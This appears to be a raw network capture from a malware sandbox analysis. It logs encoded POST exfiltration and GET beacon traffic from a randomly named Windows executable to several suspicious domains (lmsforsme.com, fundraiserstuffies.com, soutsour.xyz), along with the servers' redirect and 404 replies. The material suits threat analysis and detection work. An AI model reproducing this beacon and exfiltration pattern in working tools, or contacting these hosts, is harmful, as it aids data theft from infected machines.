                                              Jul 8, 2024 09:34:23.371140003 CEST10821OUTPOST /ji0a/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Connection: close
                                              Host: www.lmsforsme.com
                                              Origin: http://www.lmsforsme.com
                                              Referer: http://www.lmsforsme.com/ji0a/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 59 31 4f 69 50 4b 7a 4b 44 31 76 2f 55 64 4d 6c 36 35 39 53 72 32 6b 70 32 2f 6a 48 4f 34 65 6f 51 59 72 55 48 42 45 70 77 59 6e 49 59 6a 61 47 4a 6e 32 4f 6a 6f 64 78 6e 75 54 4a 33 56 6f 46 71 43 31 68 78 79 47 73 6a 4b 52 6d 2b 42 51 72 6e 32 61 47 4b 53 7a 37 41 50 75 73 6c 6a 4b 34 4c 63 35 70 38 48 77 5a 4a 35 77 6c 54 4b 72 32 4a 67 4d 78 72 59 4d 58 6a 49 64 64 6c 51 33 75 34 32 39 32 58 33 6a 73 6c 63 36 32 39 33 33 44 79 48 72 2f 79 7a 77 56 70 58 6f 46 33 6b 49 7a 64 63 58 4b 51 72 74 62 54 56 4b 79 41 57 4f 36 4c 62 36 54 6c 44 61 6c 47 39 50 4c 78 56 38 71 46 4e 4b 4d 36 79 75 77 67 78 48 55 77 42 30 34 4b 30 62 6e 39 71 49 44 34 6a 66 4e 61 66 67 57 79 2b 50 6c 39 4d 6e 7a 4b 53 41 68 49 67 4f 67 63 2f 39 66 53 6e 4f 35 67 47 53 46 79 36 30 31 6f 78 47 44 70 4c 73 35 69 70 67 74 42 4f 6d 55 47 6c 38 35 76 53 47 6f 66 74 4c 54 35 38 45 4a 65 5a 38 76 79 39 78 70 56 68 47 54 56 73 76 71 70 55 4f 71 6d 41 79 4c 33 52 65 63 4e 4c 61 77 67 2f 38 4d 2b 52 31 43 2b 72 75 4b 43 5a [TRUNCATED]
                                              Data Ascii: gNl=Y1OiPKzKD1v/UdMl659Sr2kp2/jHO4eoQYrUHBEpwYnIYjaGJn2OjodxnuTJ3VoFqC1hxyGsjKRm+BQrn2aGKSz7APusljK4Lc5p8HwZJ5wlTKr2JgMxrYMXjIddlQ3u4292X3jslc62933DyHr/yzwVpXoF3kIzdcXKQrtbTVKyAWO6Lb6TlDalG9PLxV8qFNKM6yuwgxHUwB04K0bn9qID4jfNafgWy+Pl9MnzKSAhIgOgc/9fSnO5gGSFy601oxGDpLs5ipgtBOmUGl85vSGoftLT58EJeZ8vy9xpVhGTVsvqpUOqmAyL3RecNLawg/8M+R1C+ruKCZrHhjYTP9nZ/wtoySM6Q7VNvZa06XNZYtiPGAJBHWsBKYVvLRJ/ucPEMpKxfMnM80IgYdBpjWOWr15n8OOeYddQEAygNXSSI5cGc2biANfKP/9sBCJKbr8uSli0vqvdAgzcK7FaaqP2aC5Cd/YPBZwAYtKT3FHJz06FjSpErywblGtvNohXfcoEUC2rHab1Na/+TBdl6dg8xLqm5l/DOW2pP+jLm61uG6//t5URIdyxtGjIBNrM+b6s/Ds0k6euIST/N1COXwKd+jHlw9syljUKLZj/o4dcB8NMTlQBf6Fy1TYGMsxIe15rwYQgbaMgzL1e18w/yYRcmdJ3Uo3J29UbLjJvGMrpHpP8s2sd3TJz+MzGiU71wfT4/4pFModsc70eXbFO2jRa7uW6gnVwq9WbugeEpWe76eEaTFmCqovUMn0WAPX2uIEVzLKQwdpLZ0j9vx0tcq3IrlbsGND4BnbydKNQR6I/wahKVt9wcdzdwe3VzvhjDwCXtEG1jHJqasbzn6zxKprK6bFo/KhOv2vd+RFce0UuvoSGIDjVVtbObnIPxdsrzuMEMkFHWVdeYWg20fz0fiMSqqhMOeVhCMOP2KEp2W7lqyKpr8pKmQMtsn5ZpSec6FSexhOitacSDS8zapc2/9qRkDE7EjbBgknn+v2/yt7NDJhG [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.4497543.33.130.190805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:34:25.901145935 CEST452OUTGET /ji0a/?gNl=V3mCM9XQBGvfB9U06Ih+tXIqrPaKM7STaqz3Sg8J9fi/ICLIIWXTyIdm7sWw/CYltmRpxX2KmohWm3ESn2yFDi2EPP2Dl3Wtaq56t2waT9cNTaD0UhcN7pw=&QdC=AFMh5N HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              Host: www.lmsforsme.com
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 8, 2024 09:34:26.493890047 CEST390INHTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Mon, 08 Jul 2024 07:34:26 GMT
                                              Content-Type: text/html
                                              Content-Length: 250
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 67 4e 6c 3d 56 33 6d 43 4d 39 58 51 42 47 76 66 42 39 55 30 36 49 68 2b 74 58 49 71 72 50 61 4b 4d 37 53 54 61 71 7a 33 53 67 38 4a 39 66 69 2f 49 43 4c 49 49 57 58 54 79 49 64 6d 37 73 57 77 2f 43 59 6c 74 6d 52 70 78 58 32 4b 6d 6f 68 57 6d 33 45 53 6e 32 79 46 44 69 32 45 50 50 32 44 6c 33 57 74 61 71 35 36 74 32 77 61 54 39 63 4e 54 61 44 30 55 68 63 4e 37 70 77 3d 26 51 64 43 3d 41 46 4d 68 35 4e 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?gNl=V3mCM9XQBGvfB9U06Ih+tXIqrPaKM7STaqz3Sg8J9fi/ICLIIWXTyIdm7sWw/CYltmRpxX2KmohWm3ESn2yFDi2EPP2Dl3Wtaq56t2waT9cNTaD0UhcN7pw=&QdC=AFMh5N"}</script></head></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.4497553.33.130.190805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:34:31.526988983 CEST746OUTPOST /sm5u/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Connection: close
                                              Host: www.fundraiserstuffies.com
                                              Origin: http://www.fundraiserstuffies.com
                                              Referer: http://www.fundraiserstuffies.com/sm5u/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 2b 50 78 49 46 54 4f 4e 68 4b 76 31 47 48 79 67 42 7a 61 50 30 78 48 5a 46 46 33 46 72 69 31 72 77 69 48 35 77 56 6e 49 59 35 71 4d 77 31 57 6f 68 2b 6b 4c 77 6d 46 72 71 42 4a 59 67 48 4b 4b 35 6a 68 64 53 70 57 75 6e 6d 66 39 70 4c 57 39 66 43 74 32 2b 6a 65 54 48 6d 66 47 73 55 36 62 34 62 56 36 70 62 6a 61 6a 7a 43 71 6b 6a 6a 67 48 44 76 72 79 6f 45 32 44 59 72 41 6c 70 46 6c 41 49 6e 58 43 72 55 35 56 48 37 61 4f 39 30 41 44 7a 50 68 50 4d 48 61 2f 77 66 4e 73 36 33 34 30 62 77 4d 6c 74 62 70 5a 32 68 5a 57 75 57 48 4c 4c 58 42 78 4b 45 79 62 38 5a 31 54 68 55 56 4c 41 3d 3d
                                              Data Ascii: gNl=+PxIFTONhKv1GHygBzaP0xHZFF3Fri1rwiH5wVnIY5qMw1Woh+kLwmFrqBJYgHKK5jhdSpWunmf9pLW9fCt2+jeTHmfGsU6b4bV6pbjajzCqkjjgHDvryoE2DYrAlpFlAInXCrU5VH7aO90ADzPhPMHa/wfNs6340bwMltbpZ2hZWuWHLLXBxKEyb8Z1ThUVLA==


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.2.4497563.33.130.190805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:34:34.062695026 CEST766OUTPOST /sm5u/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Connection: close
                                              Host: www.fundraiserstuffies.com
                                              Origin: http://www.fundraiserstuffies.com
                                              Referer: http://www.fundraiserstuffies.com/sm5u/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 2b 50 78 49 46 54 4f 4e 68 4b 76 31 45 6d 43 67 44 55 6d 50 79 52 48 61 4a 6c 33 46 78 53 31 76 77 69 4c 35 77 58 4c 59 59 4c 65 4d 7a 55 6d 6f 7a 50 6b 4c 7a 6d 46 72 74 78 4a 6e 34 6e 4b 42 35 6a 63 75 53 73 57 75 6e 69 50 39 70 4b 6d 39 66 56 42 31 76 6a 65 52 49 47 66 58 68 30 36 62 34 62 56 36 70 62 33 77 6a 79 6d 71 6a 54 7a 67 47 69 76 6b 74 59 45 31 47 6f 72 41 68 70 46 68 41 49 6e 68 43 75 4d 66 56 46 7a 61 4f 38 45 41 43 69 50 6d 45 4d 48 63 69 67 65 37 67 35 4f 69 35 61 64 6e 73 75 4c 4b 59 56 51 34 54 6f 48 64 61 36 32 57 6a 4b 67 42 47 37 51 42 65 69 70 63 51 4c 42 77 42 4c 4a 44 63 2f 4b 49 64 64 4a 39 31 58 35 34 31 76 41 3d
                                              Data Ascii: gNl=+PxIFTONhKv1EmCgDUmPyRHaJl3FxS1vwiL5wXLYYLeMzUmozPkLzmFrtxJn4nKB5jcuSsWuniP9pKm9fVB1vjeRIGfXh06b4bV6pb3wjymqjTzgGivktYE1GorAhpFhAInhCuMfVFzaO8EACiPmEMHcige7g5Oi5adnsuLKYVQ4ToHda62WjKgBG7QBeipcQLBwBLJDc/KIddJ91X541vA=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              15192.168.2.4497573.33.130.190805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:34:36.606571913 CEST10848OUTPOST /sm5u/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Connection: close
                                              Host: www.fundraiserstuffies.com
                                              Origin: http://www.fundraiserstuffies.com
                                              Referer: http://www.fundraiserstuffies.com/sm5u/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 2b 50 78 49 46 54 4f 4e 68 4b 76 31 45 6d 43 67 44 55 6d 50 79 52 48 61 4a 6c 33 46 78 53 31 76 77 69 4c 35 77 58 4c 59 59 4c 47 4d 7a 6e 2b 6f 69 59 77 4c 38 47 46 72 75 78 4a 63 34 6e 4b 63 35 6a 45 69 53 73 54 56 6e 6b 54 39 70 73 79 39 4f 30 42 31 6d 6a 65 52 44 6d 65 51 73 55 36 53 34 62 46 2b 70 62 6e 77 6a 79 6d 71 6a 56 50 67 42 7a 76 6b 2b 49 45 32 44 59 72 4d 6c 70 46 5a 41 4d 7a 78 43 75 34 50 56 52 2f 61 4f 63 55 41 45 51 58 6d 4a 4d 48 65 6a 67 65 7a 67 34 7a 38 35 61 52 42 73 74 58 77 59 53 67 34 65 65 6d 42 44 37 71 4e 32 4b 67 49 57 6f 73 45 56 52 46 72 55 5a 52 37 41 49 42 43 47 63 79 7a 59 2b 45 4d 6d 6b 74 67 75 4c 45 76 32 69 56 70 54 73 34 2f 36 77 68 70 6c 67 61 69 57 6a 6e 50 70 6e 45 43 2b 4a 58 30 42 6a 63 7a 66 6c 59 4a 58 63 7a 55 4e 64 42 47 56 50 74 48 5a 7a 72 58 4b 35 54 30 57 6f 72 6d 6f 39 6d 4a 34 32 49 75 61 69 37 66 62 6c 75 31 68 42 63 34 64 6a 6a 51 51 61 4b 38 53 32 71 68 74 75 55 6b 78 64 36 6d 50 62 32 67 6f 77 50 43 4f 64 59 2f 72 79 48 32 47 4a [TRUNCATED]
                                              Data Ascii: gNl=+PxIFTONhKv1EmCgDUmPyRHaJl3FxS1vwiL5wXLYYLGMzn+oiYwL8GFruxJc4nKc5jEiSsTVnkT9psy9O0B1mjeRDmeQsU6S4bF+pbnwjymqjVPgBzvk+IE2DYrMlpFZAMzxCu4PVR/aOcUAEQXmJMHejgezg4z85aRBstXwYSg4eemBD7qN2KgIWosEVRFrUZR7AIBCGcyzY+EMmktguLEv2iVpTs4/6whplgaiWjnPpnEC+JX0BjczflYJXczUNdBGVPtHZzrXK5T0Wormo9mJ42Iuai7fblu1hBc4djjQQaK8S2qhtuUkxd6mPb2gowPCOdY/ryH2GJpsH3AOzVjMothxua46BvwX/G/fNRHyVdrBAEwrw3yFk3/4tkExb304u/cuMfWNYcyaKqpf41S3ljiUBQv0IlmKNfqOEeF6CTjku7PviVFkgZhlDUx7WiP2yCHZBMX/+5HiXtx+I/L2jax8nE5mSJB2O4JqmuV1IOXAo+ZhurOF1GW0DyryPdvmdSeMu/A9aUR+peXFKhmJCrQ8TTvkJ8KU4qI5nvKWC+2SPrDb74t/fesQywr1Hb1EPF4JF2O2RRzq1m+T57QwaqmQKqBhlBaXdzMFQUigO4LleS1rmAlxpxW7Bdygx/cb3kRkjkr1ShdHKJruKcfvKZz4yTsd1c9VL+/8tbvxAuu/UQUWCHCVU/1OYgJfkYur8Rai4LN8OVaqQkddyse6OSrHdZkYIJs45Y6umHgeVNIu73BsWh3aan6PS80nnXZt5iLeKU//BJzW77ScS3ECIcC1zsowCIZb97AFfuuVk4HLKfl7zIMLP9JQcTxghsvmT6s9HaV3tU/SXR/2KKY+MRz0VIz2U0FKLp/2fm9v8pcbytrV/kgV/nlVBO4M9HWiU1VEc22n2s5qpYgnLnUpRBULEhM8PvTuWlEKyeZQMCsd2+nLg8HyjU4fsVyUjUfY37KwRzWLypwkW/vdBv+f1laG04StdNVCb0aeUj7LXn3A [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              16192.168.2.4497583.33.130.190805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:34:39.138565063 CEST461OUTGET /sm5u/?QdC=AFMh5N&gNl=zNZoGmKn88rfb3KOdi+n0xDDAiSnmhNP+SjTw3nNTKqa02KirOkI5zxlnzd0nBaR3gkleMTrs3XUtciJN1tFuT7tPHWqtnmTkchQjLPuknfMv3nJFi7Ou4E= HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              Host: www.fundraiserstuffies.com
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 8, 2024 09:34:39.617795944 CEST390INHTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Mon, 08 Jul 2024 07:34:39 GMT
                                              Content-Type: text/html
                                              Content-Length: 250
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 64 43 3d 41 46 4d 68 35 4e 26 67 4e 6c 3d 7a 4e 5a 6f 47 6d 4b 6e 38 38 72 66 62 33 4b 4f 64 69 2b 6e 30 78 44 44 41 69 53 6e 6d 68 4e 50 2b 53 6a 54 77 33 6e 4e 54 4b 71 61 30 32 4b 69 72 4f 6b 49 35 7a 78 6c 6e 7a 64 30 6e 42 61 52 33 67 6b 6c 65 4d 54 72 73 33 58 55 74 63 69 4a 4e 31 74 46 75 54 37 74 50 48 57 71 74 6e 6d 54 6b 63 68 51 6a 4c 50 75 6b 6e 66 4d 76 33 6e 4a 46 69 37 4f 75 34 45 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?QdC=AFMh5N&gNl=zNZoGmKn88rfb3KOdi+n0xDDAiSnmhNP+SjTw3nNTKqa02KirOkI5zxlnzd0nBaR3gkleMTrs3XUtciJN1tFuT7tPHWqtnmTkchQjLPuknfMv3nJFi7Ou4E="}</script></head></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              17192.168.2.449759203.161.41.207805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:34:44.802546024 CEST716OUTPOST /etzb/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Connection: close
                                              Host: www.soutsour.xyz
                                              Origin: http://www.soutsour.xyz
                                              Referer: http://www.soutsour.xyz/etzb/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 2f 33 4e 64 58 2f 63 51 38 47 30 44 44 55 72 73 35 63 55 67 67 52 51 66 46 33 43 46 68 43 72 62 33 49 43 6c 68 2b 6b 31 5a 48 43 32 44 2b 30 37 74 2f 61 56 64 67 74 44 44 6d 64 67 31 57 4e 69 58 51 6c 34 51 64 6f 70 6a 79 6b 65 50 4e 70 61 6c 65 77 65 31 42 68 5a 66 62 54 6d 79 75 38 53 55 72 39 50 76 70 5a 37 51 38 77 38 4d 52 51 33 70 61 66 51 4e 46 73 52 31 32 6d 6b 58 49 6a 54 34 72 34 4b 4b 4e 44 44 79 52 39 77 67 2b 74 6a 44 6f 6f 70 43 56 4e 76 32 6c 64 74 77 59 76 6f 36 66 79 37 4f 63 51 77 59 36 6d 63 71 78 43 52 39 34 44 58 65 62 70 70 45 48 7a 64 31 32 30 4c 4e 67 3d 3d
                                              Data Ascii: gNl=/3NdX/cQ8G0DDUrs5cUggRQfF3CFhCrb3IClh+k1ZHC2D+07t/aVdgtDDmdg1WNiXQl4QdopjykePNpalewe1BhZfbTmyu8SUr9PvpZ7Q8w8MRQ3pafQNFsR12mkXIjT4r4KKNDDyR9wg+tjDoopCVNv2ldtwYvo6fy7OcQwY6mcqxCR94DXebppEHzd120LNg==
                                              Jul 8, 2024 09:34:45.390484095 CEST533INHTTP/1.1 404 Not Found
                                              Date: Mon, 08 Jul 2024 07:34:45 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              18192.168.2.449760203.161.41.207805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:34:47.337887049 CEST736OUTPOST /etzb/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Connection: close
                                              Host: www.soutsour.xyz
                                              Origin: http://www.soutsour.xyz
                                              Referer: http://www.soutsour.xyz/etzb/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 2f 33 4e 64 58 2f 63 51 38 47 30 44 43 31 62 73 71 2f 4d 67 6c 78 51 63 59 48 43 46 76 69 72 66 33 49 2b 6c 68 2f 67 6c 5a 31 6d 32 41 62 59 37 73 36 36 56 65 67 74 44 49 47 64 66 37 32 4e 31 58 51 70 4b 51 5a 6f 70 6a 79 59 65 50 4e 35 61 6c 74 6f 42 31 52 68 66 4c 72 54 65 73 65 38 53 55 72 39 50 76 70 64 52 51 39 55 38 4d 46 73 33 6f 2b 4c 52 45 6c 73 57 79 32 6d 6b 42 49 6a 58 34 72 34 6f 4b 4d 65 59 79 58 35 77 67 38 6c 6a 44 39 49 71 59 46 4e 70 34 46 63 39 77 4c 4b 62 34 50 76 79 4e 66 46 58 51 4a 47 71 76 33 54 4c 73 4a 69 41 4d 62 4e 61 5a 41 36 70 34 31 4a 43 57 71 6d 42 76 65 47 79 75 38 33 52 41 70 46 71 31 47 61 56 6c 47 34 3d
                                              Data Ascii: gNl=/3NdX/cQ8G0DC1bsq/MglxQcYHCFvirf3I+lh/glZ1m2AbY7s66VegtDIGdf72N1XQpKQZopjyYePN5altoB1RhfLrTese8SUr9PvpdRQ9U8MFs3o+LRElsWy2mkBIjX4r4oKMeYyX5wg8ljD9IqYFNp4Fc9wLKb4PvyNfFXQJGqv3TLsJiAMbNaZA6p41JCWqmBveGyu83RApFq1GaVlG4=
                                              Jul 8, 2024 09:34:47.935069084 CEST533INHTTP/1.1 404 Not Found
                                              Date: Mon, 08 Jul 2024 07:34:47 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              19192.168.2.449761203.161.41.207805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:34:49.873259068 CEST10818OUTPOST /etzb/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Connection: close
                                              Host: www.soutsour.xyz
                                              Origin: http://www.soutsour.xyz
                                              Referer: http://www.soutsour.xyz/etzb/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
